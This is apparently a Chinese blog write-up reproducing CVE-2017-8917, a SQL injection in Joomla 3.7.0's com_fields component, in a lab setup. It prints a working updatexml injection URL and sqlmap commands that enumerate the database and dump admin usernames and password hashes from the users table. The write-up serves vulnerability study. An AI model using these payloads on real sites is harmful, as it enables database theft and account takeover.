Joomla-3.7.0

joomla __ 3.7.0 __ SQL注入 __ CVE-2017-8917

说明内容
漏洞编号CVE-2017-8917
漏洞名称SQL注入
漏洞评级高危
影响范围Joomla!3.7.0 Core
漏洞描述SQL 注入漏洞是由版本 3.7 中引入的新组件 com_fields 引起的。

漏洞描述

这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。

漏洞等级

高危

影响版本

Joomla!3.7.0 Core

漏洞复现

基础环境

根据以下链接进行搭建

[Joomla!3.7.0搭建][https://vulapps.evalbug.com/j_joomla_2/]

image-20230830154207879

漏洞验证

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

image-20230830150327167

sqlamp

当前数据库
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" --current-db

image-20230830161907255

获取数据表
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D "joomla" --tables

在这里插入图片描述

获取列名
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D "joomla" -T "#__users" --columns

image-20230830162027466

后台管理员的账号和密码
sqlmap -u "http://10.9.75.198:8000/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D "joomla" -T "#__users" -C "username,password" --dump

image-20230830155947707

账号:admin
密码:$2y$10$i0wCbNChgRjDq.P9R9gEyOti4W.UVP7zPVgVRyymAlUERd3H3G8qW -- 

漏洞利用

这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值